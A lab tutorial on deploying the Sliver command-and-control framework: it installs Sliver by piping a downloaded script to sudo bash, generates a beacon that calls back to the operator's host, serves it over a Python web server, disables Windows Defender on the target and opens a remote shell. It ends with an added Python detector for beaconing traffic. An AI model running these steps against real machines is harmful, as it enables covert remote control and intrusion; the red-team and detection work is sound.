This tutorial will cover how to set up a Sliver host (tested with Ubuntu 20.04, but it should work with other distributions).
To get started, the simplest way is to utilize their 'one-liner' installation.
Simply go to any terminal with elevated permissions and run:
curl https://sliver.sh/install | sudo bash
This should begin the installation process for whatever version of Linux you are using.
Note: The Sliver host can be a Windows machine, but Sliver themselves advise against it as some features will not work as expected.
Before you run the service, you may want to install mingw-w64 to allow DLL payloads and shellcode to be deployed.
To run the service, simply type sliver into your terminal and it should start up.
Before you start the service, please take note of your IP address using either ip address or hostname -I, if not already known.
The most basic feature that we will be utilizing first is a listener. To start a listener, open sliver and input http -l <port>. You can also just run http to open the default port of 80. However, I used port 8080 as this will be useful in future steps when running the file server.
If you attempt to open a port that is already running a listener, your output will look like this:
Whereas open ports should look like this:
For now, just open one listener at port 8080 and then continue on in this guide.
If you wish to see which listeners are running, type jobs into the terminal to see them.
The next step is to utilize this listener using a beacon. A beacon is a generated executable that, once run on the machine to be infected (we'll get there soon), will allow you to run commands as said infected computer.
If you are targeting a Linux Machine instead of a Windows machine, please look here! Linux Instructions
To create the beacon, you will run a command similar to the following:
generate beacon -b <YOURLINUXIP>:8080
This will create an executable which you will serve up to the machine that is to be 'infected' (for non-malicious purposes, of course).
The next step is somewhat up to personal preference and can be done in countless ways. The way I will be covering uses Python, but you can also use Apache or any other HTTP file server of your choice. This step doesn't even necessarily need to be done using HTTP, as there are also DNS, TCP, and other methods of transferring this executable, but HTTP is the simplest, so that's the one we went with.
To start a webserver using python, first check that you have python installed on your machine (it does not need to be python3).
I would highly recommend hosting this server as a background process using & so that you can reopen sliver, although you could also run this server inside a container or on another page of your terminal if your machine supports that.
If you have python3, you can run this command: python3 -m http.server &. If you have a valid internet connection, you should get a response saying your machine is now hosting on 0.0.0.0:8000.
If you do not have python3, you can run this command: python -m SimpleHTTPServer &.
Both of these methods should result in the same outcome, with a simple HTTP server hosting the files in your current directory.
Now that we have a file server on our Linux machine that is serving up the executable file, we can move on to our Windows Machine.
Note: the infected machine can also be a Linux machine, but it will not have some of the same features as a Windows client.
Infecting the Windows Machine will first and foremost require some changes to Windows Defender. Sadly, due to the popularity of this tool, Windows Defender has wised up and will recognize the signature, not allowing you to run the executable otherwise. Locate the Virus & threat protection settings using the search bar:
Go to Virus & Threat protection settings:
And at the bare minimum, disable Automatic sample submission:
I went ahead and disabled all, as this is a virtual machine purely for the sake of testing and I didn't want any impedance.
Next, open any internet browser (I used Internet Explorer) and access the file server that was previously opened in the Serve Up Executable step.
What you should then find is a very simple webpage with the files listed at the directory where the executable is. (You should only see one executable, unless you generated multiple like me)
If there is no page found, then you are probably experiencing the same issue I was, which is... networking. To fix this, I utilized Port Forwarding on VirtualBox between my two machines, and an inter-machine NAT Network that took a while to figure out. Networking with virtual machines can be a huge pain, so if you would like a guide, I would look here
Otherwise, you should see something like this:
Next, click on the hyperlink to the executable and run:
Upon doing so, Sliver should hint that someone is falling for the trap!
Once the executable is done running, you are done with the client. You're in, that easy!
These instructions are the same for both Windows and Linux
Upon the executable finishing its execution, you should see this on your sliver host:
You can type beacons into your terminal to see the newly infected computer available to your host (I've done this a few times):
Next, you will open up a session with your infected client.
Simply type use, tab to auto fill the session id, and press enter on the desired session:
Now that the session is open, you have a myriad of options available to you. I will not cover all of them, only an important one, which is opening a PowerShell session on the infected client.
These instructions are the same for both Windows and Linux
To open a shell, you will need to create an interactive session.
To do so, first type interactive into your terminal.
Open that new session using use (in the image above, the first part of the id you want to find is referenced, in this case 10329df6 ...):
This will open an 'interactive' session which will allow you to run a shell (you may need to wait for the command to run, because beacons use a periodic execution strategy to avoid detection).
To confirm if you are in the correct session, your terminal should be red if you are in an interactive session.
Now, simply type shell into your terminal, accept the disclaimer, and you can now run PowerShell / bash commands on your client as if you were the user!
This shell can now be used to run atomic tests, or whatever else you could think to do with this.
Bonus: Even though the executable can be run without elevated permissions, sudo commands can be run.
Neat!
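Added example (not part of the original tutorial and not Sliver's own code): the periodic check-in mentioned in the interactive-session step is the trait defenders look for in proxy or firewall logs once a lab run like this one has produced traffic. The Python below flags client/destination pairs whose request spacing is unusually regular; the log format, addresses, and the min_events and max_cv thresholds are constructed assumptions.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample proxy log: timestamp, client, destination host:port, path.
# 10.0.2.15 calls back about every 60 s; 10.0.2.20 browses at irregular times.
SAMPLE_LOG = """\
2024-01-01T09:58:40 10.0.2.15 192.0.2.10:8000 /payload.exe
2024-01-01T10:00:00 10.0.2.15 192.0.2.10:8080 /a
2024-01-01T10:00:05 10.0.2.20 198.51.100.7:443 /index
2024-01-01T10:00:06 10.0.2.20 198.51.100.7:443 /style
2024-01-01T10:00:09 10.0.2.20 198.51.100.7:443 /logo
2024-01-01T10:01:03 10.0.2.15 192.0.2.10:8080 /b
2024-01-01T10:01:58 10.0.2.15 192.0.2.10:8080 /c
2024-01-01T10:03:01 10.0.2.15 192.0.2.10:8080 /d
2024-01-01T10:04:00 10.0.2.15 192.0.2.10:8080 /e
2024-01-01T10:05:02 10.0.2.15 192.0.2.10:8080 /f
2024-01-01T10:07:30 10.0.2.20 198.51.100.7:443 /news
2024-01-01T10:07:31 10.0.2.20 198.51.100.7:443 /news.js
2024-01-01T10:21:00 10.0.2.20 198.51.100.7:443 /about
"""

def parse(log):
    """Group request timestamps by (client, destination)."""
    flows = defaultdict(list)
    for line in log.strip().splitlines():
        ts, client, dest, _path = line.split()
        flows[(client, dest)].append(datetime.fromisoformat(ts))
    return flows

def beacon_candidates(log, min_events=5, max_cv=0.2):
    """Return {(client, dest): (mean_gap_s, cv)} for flows with regular timing.

    cv is the coefficient of variation (stdev / mean) of the gaps between
    requests: human browsing is bursty (cv near or above 1), while a timer
    with modest jitter stays well below that.
    """
    hits = {}
    for key, times in parse(log).items():
        if len(times) < min_events:
            continue  # too few requests to judge regularity
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue  # identical timestamps, no usable interval
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            hits[key] = (round(mean, 1), round(cv, 3))
    return hits

if __name__ == "__main__":
    for flow, stats in beacon_candidates(SAMPLE_LOG).items():
        print(flow, stats)
```

Tune max_cv against your own baseline traffic, since a callback configured with wide jitter produces a higher cv than the constructed sample does.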